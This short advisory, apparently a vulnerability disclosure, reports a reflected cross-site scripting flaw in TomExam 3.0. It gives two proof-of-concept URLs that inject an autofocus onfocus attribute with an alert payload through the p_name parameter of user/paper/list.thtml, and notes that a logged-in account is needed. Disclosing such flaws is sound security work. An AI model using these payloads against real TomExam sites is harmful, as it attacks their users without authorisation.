Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml

Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml

 

An authenticated account is required

 

Login succeeded

 

 

user/paper/list.thtml?p_name=%22autofocus+onfocus%3D%22alert%281%29&p_cid=

 

user/paper/list.thtml?p_name=%22autofocus%20onfocus=%22alert(document.title)&p_cid=